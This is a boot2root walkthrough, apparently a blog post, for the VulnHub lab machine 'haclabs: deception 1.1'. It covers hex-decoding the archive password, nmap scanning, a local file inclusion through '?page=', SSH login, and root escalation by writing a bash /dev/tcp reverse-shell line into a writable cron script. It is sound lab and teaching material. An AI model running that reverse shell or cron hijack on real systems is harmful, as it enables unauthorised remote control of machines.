top of page
Search

haclabs : deception 1.1

In this article we are going to solve another boot2root challenge . It is a beginner level challenge and we can download this machine from vulnhub.

To complete this challenge we need 3 flags.


Flag 2 :


We downloaded the machine as usual but when we tried to unzip it says that it is password protected and we need to crack the password to get the .ova file , otherwise we can't continue with the machine . So we noticed a note from author of the machine in the description of the machine on vulnhub website

we try to crack this hash by using different hashing methods but failed here , So the things is that it comes out to be a hex string and if use any online tool to convert hex to text we get a string "deception1.1" and yes that is the password of the zip file.



so flag2 is 646563657074696f6e312e31


Flag 1 :


Now we successfully import the machine inside the virtual box and by using the command netdiscover utility we discover the IP of the machine

and then we run a nmap scan using the command nmap -v -sV <target_ip> , we found that only two ports are open 80 and 22 , So we decided to browse HTTP Service and we found a simple password strength checker website .

This is a simple website that can check password strength . if we type in 1234 then it gives us the message

Now lets try a proper combination to make a strong password . Now after using the password Haclabs!@1 we got a pop-up.

Pop-up says : 0000flagflagflagflag.php , this means this is a webpage and if we try to open this we have an error . Now if we look carefully at the line

Now if we observe this message carefully then it says that value of flag is 1 , means directory is 00001111.php,after opening the URL http://192.168.43.71/00001111.php we again see a pop-up.

now the pop says to find password.txt file , may be that file must have a hint or ca have something else.

We need to find password.txt file , we checked the source code of the webpage it says to use ?page= , means we can read the file it is a LFI vulnerability .

we are able to successfully read the password.txt file.

very clear from the line , means here we have to generate different combination to find the correct password and we are able to find the correct password as ya5hay ( not disclosing the actual command to get the correct combination )

Now we use this password to connect to SSH as user yash and yes we are in.

now we can find our flag in the home directory of user yash , other than this, for privilege escalation we noticed a file temp.sh that is running as cronjob by root and user yash has the permission to write this file .

we edit this file with a quick reverse shell as


#!/bin/bash

bash -i >& /dev/tcp/192.168.1.13/9999 0>&1

and after 1 minute we have the root shell and can read the last flag inside /root directory.


This walkthrough is contributed by mike jovani , Contact him at : mike.jovani@gmail.com

0 comments

Recent Posts

See All

As you all know that our website is providing walkthrough of different challenges from different platforms and without any advertisement but due to some funds issue we can't continue this website :( S

bottom of page